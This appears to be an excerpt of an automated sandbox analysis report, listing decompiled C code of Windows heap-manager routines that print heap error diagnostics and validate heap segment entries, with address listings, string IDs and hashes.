                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 44%
                                                                                                                          			E00A81C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x9a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E009CB150();
				} else {
					E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xab589c);
				E009CB150("Heap error detected at %p (heap handle %p)\n",  *0xab58a0);
				_t27 =  *0xab5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00A81E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E009CB150();
				} else {
					E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E009CB150("Error code: %d - %s\n",  *0xab5898);
				_t113 =  *0xab58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E009CB150();
					} else {
						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E009CB150("Parameter1: %p\n",  *0xab58a4);
				}
				_t115 =  *0xab58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E009CB150();
					} else {
						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E009CB150("Parameter2: %p\n",  *0xab58a8);
				}
				_t117 =  *0xab58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E009CB150();
					} else {
						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E009CB150("Parameter3: %p\n",  *0xab58ac);
				}
				_t119 =  *0xab58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E009CB150();
					} else {
						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xab58b4);
					E009CB150("Last known valid blocks: before - %p, after - %p\n",  *0xab58b0);
				} else {
					_t120 =  *0xab58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E009CB150();
				} else {
					E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E009CB150("Stack trace available at %p\n", 0xab58c0);
			}











                                                                                                                          0x00a81c10
                                                                                                                          0x00a81c16
                                                                                                                          0x00a81c1e
                                                                                                                          0x00a81c3d
                                                                                                                          0x00a81c3e
                                                                                                                          0x00a81c20
                                                                                                                          0x00a81c35
                                                                                                                          0x00a81c3a
                                                                                                                          0x00a81c44
                                                                                                                          0x00a81c55
                                                                                                                          0x00a81c5a
                                                                                                                          0x00a81c65
                                                                                                                          0x00a81c67
                                                                                                                          0x00000000
                                                                                                                          0x00a81c6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a81c67
                                                                                                                          0x00a81cdc
                                                                                                                          0x00a81ce5
                                                                                                                          0x00a81d04
                                                                                                                          0x00a81d05
                                                                                                                          0x00a81ce7
                                                                                                                          0x00a81cfc
                                                                                                                          0x00a81d01
                                                                                                                          0x00a81d0b
                                                                                                                          0x00a81d17
                                                                                                                          0x00a81d1f
                                                                                                                          0x00a81d25
                                                                                                                          0x00a81d30
                                                                                                                          0x00a81d4f
                                                                                                                          0x00a81d50
                                                                                                                          0x00a81d32
                                                                                                                          0x00a81d47
                                                                                                                          0x00a81d4c
                                                                                                                          0x00a81d61
                                                                                                                          0x00a81d67
                                                                                                                          0x00a81d68
                                                                                                                          0x00a81d6e
                                                                                                                          0x00a81d79
                                                                                                                          0x00a81d98
                                                                                                                          0x00a81d99
                                                                                                                          0x00a81d7b
                                                                                                                          0x00a81d90
                                                                                                                          0x00a81d95
                                                                                                                          0x00a81daa
                                                                                                                          0x00a81db0
                                                                                                                          0x00a81db1
                                                                                                                          0x00a81db7
                                                                                                                          0x00a81dc2
                                                                                                                          0x00a81de1
                                                                                                                          0x00a81de2
                                                                                                                          0x00a81dc4
                                                                                                                          0x00a81dd9
                                                                                                                          0x00a81dde
                                                                                                                          0x00a81df3
                                                                                                                          0x00a81df9
                                                                                                                          0x00a81dfa
                                                                                                                          0x00a81e00
                                                                                                                          0x00a81e0a
                                                                                                                          0x00a81e13
                                                                                                                          0x00a81e32
                                                                                                                          0x00a81e33
                                                                                                                          0x00a81e15
                                                                                                                          0x00a81e2a
                                                                                                                          0x00a81e2f
                                                                                                                          0x00a81e39
                                                                                                                          0x00a81e4a
                                                                                                                          0x00a81e02
                                                                                                                          0x00a81e02
                                                                                                                          0x00a81e08
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a81e08
                                                                                                                          0x00a81e5b
                                                                                                                          0x00a81e7a
                                                                                                                          0x00a81e7b
                                                                                                                          0x00a81e5d
                                                                                                                          0x00a81e72
                                                                                                                          0x00a81e77
                                                                                                                          0x00a81e95

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                          • API String ID: 0-2897834094
                                                                                                                          • Opcode ID: 1afd6d58a641ed55e2860dcd14792b49f1915fbb8255b4f1dd320975e3c70494
                                                                                                                          • Instruction ID: 54db5487813737afdb5cc814c4193376c90f868db718f5268d53437af53a51e6
                                                                                                                          • Opcode Fuzzy Hash: 1afd6d58a641ed55e2860dcd14792b49f1915fbb8255b4f1dd320975e3c70494
                                                                                                                          • Instruction Fuzzy Hash: 6B61C132D54644DFC721BB94D996FB073FCEB44B30B1D803EF80A6B262D6649C429B0A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A84AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 59%
                                                                                                                          			E00A84AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E009CB150();
						} else {
							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E009CB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E009CB150();
					} else {
						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E00A7FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E009CB150();
						} else {
							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E009CB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E009CB150();
								} else {
									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E009CB150();
									} else {
										E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E009CB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E00A7FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E009CB150();
										} else {
											E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E00A1D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E009CB150();
								} else {
									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E00A8A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E009EE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E00A8A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E009EE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E009EA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E009EA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E009EBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E00A723E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E009C1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                                                                                          0x00a84af7
                                                                                                                          0x00a84afb
                                                                                                                          0x00a84afd
                                                                                                                          0x00a84b01
                                                                                                                          0x00a84b03
                                                                                                                          0x00a84b08
                                                                                                                          0x00a84b0a
                                                                                                                          0x00a84b0f
                                                                                                                          0x00a84eb5
                                                                                                                          0x00a84eb5
                                                                                                                          0x00a84ebb
                                                                                                                          0x00a850d5
                                                                                                                          0x00a850d8
                                                                                                                          0x00a84ff6
                                                                                                                          0x00000000
                                                                                                                          0x00a84ff6
                                                                                                                          0x00a850de
                                                                                                                          0x00a850e4
                                                                                                                          0x00a850e8
                                                                                                                          0x00a85107
                                                                                                                          0x00a8510c
                                                                                                                          0x00a850ea
                                                                                                                          0x00a850ff
                                                                                                                          0x00a85104
                                                                                                                          0x00a85112
                                                                                                                          0x00a85115
                                                                                                                          0x00a85118
                                                                                                                          0x00a85119
                                                                                                                          0x00a850cb
                                                                                                                          0x00a850cb
                                                                                                                          0x00a850af
                                                                                                                          0x00000000
                                                                                                                          0x00a850af
                                                                                                                          0x00a84ecb
                                                                                                                          0x00a850b6
                                                                                                                          0x00a850bb
                                                                                                                          0x00a84ed1
                                                                                                                          0x00a84ee6
                                                                                                                          0x00a84eeb
                                                                                                                          0x00a850c1
                                                                                                                          0x00a850c2
                                                                                                                          0x00a850c5
                                                                                                                          0x00a850c6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84b15
                                                                                                                          0x00a84b15
                                                                                                                          0x00a84b1c
                                                                                                                          0x00a84b1e
                                                                                                                          0x00a84b23
                                                                                                                          0x00a84b27
                                                                                                                          0x00a84b33
                                                                                                                          0x00a84b38
                                                                                                                          0x00a84b3a
                                                                                                                          0x00a84b3c
                                                                                                                          0x00a84b41
                                                                                                                          0x00a84b41
                                                                                                                          0x00a84b3a
                                                                                                                          0x00a84b52
                                                                                                                          0x00a85045
                                                                                                                          0x00a8504b
                                                                                                                          0x00a8504f
                                                                                                                          0x00a8506e
                                                                                                                          0x00a85073
                                                                                                                          0x00a85051
                                                                                                                          0x00a85066
                                                                                                                          0x00a8506b
                                                                                                                          0x00a85083
                                                                                                                          0x00a85088
                                                                                                                          0x00a85088
                                                                                                                          0x00a8508a
                                                                                                                          0x00a85091
                                                                                                                          0x00a85099
                                                                                                                          0x00a85099
                                                                                                                          0x00a8509d
                                                                                                                          0x00a850a7
                                                                                                                          0x00a850ad
                                                                                                                          0x00a850ad
                                                                                                                          0x00a850ad
                                                                                                                          0x00000000
                                                                                                                          0x00a8509d
                                                                                                                          0x00a84b58
                                                                                                                          0x00a84b5b
                                                                                                                          0x00a84b5e
                                                                                                                          0x00a84b63
                                                                                                                          0x00a84b66
                                                                                                                          0x00a84b69
                                                                                                                          0x00a84b6f
                                                                                                                          0x00a84be4
                                                                                                                          0x00a84bf0
                                                                                                                          0x00a84bf2
                                                                                                                          0x00a84bf5
                                                                                                                          0x00a84dc3
                                                                                                                          0x00a84dc6
                                                                                                                          0x00a84dc9
                                                                                                                          0x00a84dce
                                                                                                                          0x00a84dce
                                                                                                                          0x00a84dd0
                                                                                                                          0x00a84dd0
                                                                                                                          0x00a84dd5
                                                                                                                          0x00a84def
                                                                                                                          0x00a84dd7
                                                                                                                          0x00a84de7
                                                                                                                          0x00a84de7
                                                                                                                          0x00a84df3
                                                                                                                          0x00a85001
                                                                                                                          0x00a85007
                                                                                                                          0x00a8500b
                                                                                                                          0x00a8502a
                                                                                                                          0x00a8502f
                                                                                                                          0x00a8500d
                                                                                                                          0x00a85022
                                                                                                                          0x00a85027
                                                                                                                          0x00a85039
                                                                                                                          0x00a8503a
                                                                                                                          0x00a8503b
                                                                                                                          0x00000000
                                                                                                                          0x00a84df9
                                                                                                                          0x00a84dfd
                                                                                                                          0x00a84e90
                                                                                                                          0x00a84e94
                                                                                                                          0x00a84e9e
                                                                                                                          0x00a84ea4
                                                                                                                          0x00a84ea4
                                                                                                                          0x00a84ea4
                                                                                                                          0x00a84ea6
                                                                                                                          0x00a84ea6
                                                                                                                          0x00000000
                                                                                                                          0x00a84ea6
                                                                                                                          0x00a84e03
                                                                                                                          0x00a84e08
                                                                                                                          0x00a84f88
                                                                                                                          0x00a84f92
                                                                                                                          0x00a84f99
                                                                                                                          0x00a84f9c
                                                                                                                          0x00a84fe0
                                                                                                                          0x00a84fe4
                                                                                                                          0x00a84fee
                                                                                                                          0x00a84ff4
                                                                                                                          0x00a84ff4
                                                                                                                          0x00a84ff4
                                                                                                                          0x00000000
                                                                                                                          0x00a84fe4
                                                                                                                          0x00a84f9e
                                                                                                                          0x00a84fa4
                                                                                                                          0x00a84fa8
                                                                                                                          0x00a84fc7
                                                                                                                          0x00a84fcc
                                                                                                                          0x00a84faa
                                                                                                                          0x00a84fbf
                                                                                                                          0x00a84fc4
                                                                                                                          0x00a84fd2
                                                                                                                          0x00a84fd5
                                                                                                                          0x00a84fd6
                                                                                                                          0x00a84f34
                                                                                                                          0x00a84f34
                                                                                                                          0x00000000
                                                                                                                          0x00a84f39
                                                                                                                          0x00a84e0e
                                                                                                                          0x00a84e14
                                                                                                                          0x00a84e1b
                                                                                                                          0x00a84e25
                                                                                                                          0x00a84e2b
                                                                                                                          0x00a84e2b
                                                                                                                          0x00a84e33
                                                                                                                          0x00a84e38
